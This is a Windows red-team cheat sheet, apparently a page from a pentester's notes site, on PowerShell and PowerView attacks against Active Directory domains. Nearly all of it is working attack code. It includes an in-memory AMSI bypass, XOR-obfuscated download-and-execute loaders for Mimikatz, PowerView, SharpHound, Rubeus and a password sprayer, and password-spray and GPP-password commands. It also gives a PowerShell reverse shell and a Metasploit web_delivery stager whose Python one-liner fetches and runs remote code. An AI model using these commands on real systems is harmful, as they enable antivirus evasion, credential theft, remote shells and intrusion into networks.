Powershell / PowerView

Sometimes your stuck with the tools in front of you and no linux etc

No AV

PowerUp / swap out with other scripts via shell

powershell -c "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.ps1'); invoke-sharefinder -checkshareaccess"

XOR Encode powershell payload

$file=([Text.Encoding]::UTF8.GetBytes([IO.File]::ReadAllText(".\Get-GPPPassword.ps1"))| %{$_ -bXor0x11})
[io.file]::WriteAllBytes('.\Get-GPPPassword.txt',$file)

Bypass AMSI

$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

Import AD Recon

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/adrecon.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import PowerView

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerView.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import DomainPasswordSpray

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/DomainPasswordSpray.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

# Run with
Invoke-DomainPasswordSpray -domain thehackerlab.local -UsernameAsPassword -UserList users.txt -OutFile valid-creds.txt

Then 

Invoke-DomainPasswordSpray -domain thehackerlab.local -UserList users.txt -OutFile valid-creds.txt -Password Winter2016

Import Get-GPPPassword

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Get-GPPPassword.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

# Run with
Get-GPPPassword -server thehackerlab.com

Import Sherlock

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-Sherlock.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import PowerUp

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import Sharphound

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-SharpHound.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import Mimikatz

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/mimikatz.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Import PowershellTCP

$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerShellTcp.txt"

$enc = [system.Text.Encoding]::UTF8
$file = ((New-Object Net.Webclient).DownloadString($file))
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
iex ([System.Text.Encoding]::ASCII.GetString($data))

Upgrade nc shell to reverse meterpreter for pivoting

# Then run
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 4444

Download Rubeus.exe

$x = (New-Object System.Net.WebClient).downloadData(‘https://github.com/jdksec/RemoteTools/raw/master/Rubeus.exe’)
$y = [System.Reflection.Assembly]::Load($x)
[Rubeus.Program]::Main(“triage”.Split())

Install python from the windows store as a low priv user

# On attacking server
use exploit/multi/script/web_delivery
set lhost 192.168.1.1
set lport 80
set srvport 443
set payload python/meterpreter/reverse_tcp 
exploit

# On victim machine 
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.1:443/vcHsXENK', context=ssl._create_unverified_context());exec(r.read());"

Recon all computers in domain

Get-NetComputer –OperatingSystem *2003* | Out-File –Encoding ASCII Windows2003Hosts.txt 
Get-NetComputer –OperatingSystem *2008* | Out-File –Encoding ASCII Windows2008Hosts.txt 
Get-NetComputer –OperatingSystem *2012* | Out-File –Encoding ASCII Windows2012Hosts.txt 
Get-NetComputer –OperatingSystem *2016* | Out-File –Encoding ASCII Windows2016Hosts.txt 
Get-NetComputer –OperatingSystem *2019* | Out-File –Encoding ASCII Windows2019Hosts.txt 
Get-NetComputer –OperatingSystem *XP* | Out-File –Encoding ASCII WindowsXPHosts.txt 
Get-NetComputer –OperatingSystem *7* | Out-File –Encoding ASCII Windows7Hosts.txt
Get-NetComputer –OperatingSystem * 8* | Out-File –Encoding ASCII Windows8Hosts.txt 
Get-NetComputer –OperatingSystem *10* | Out-File –Encoding ASCII Windows10Hosts.txt

Get list of all dns hostnames in domain

get-netcomputer -domain thehackerlab.local | select dnshostname | out-file -append allcomputers.txt

Count number of lines in file

get-content .\allcomputers.txt | measure-object -line

Find interesting shares

Get-NetComputer -domain thehackerlab.com | export-csv -Encoding ASCII allhosts.csv
import-csv .\allhosts.csv | select dnshostname | out-file dnshostnames.txt
get-content .\dnshostnames.txt | foreach-object {invoke-sharefinder -computername $_ -checkshareaccess} |export-csv -append shares.csv

Split csv to hostnames

import-csv .\shares.csv | select ComputerName > hostnames.txt

Sort hostnames so they are unique

type .\hostnames.txt | get-unique |out-file uniquehostnames.txt

Get live IP addresses

Get-Content .\allcomputers.txt | ForEach-Object{
$hostname = ([system.net.dns]::gethostaddresses("$_")).IPAddressToString
if($? -eq $True) {
  $_ +": "+ $hostname 
  $hostname >> ipaddresses.txt
}
else {
   $_ +": Cannot resolve hostname"
}}

Remove all external addresses

type ipaddresses.txt | findstr "192.168 10. 172.32" > internalips.txt

PreviousGolang NextPurpleSharp

Last updated 3 years ago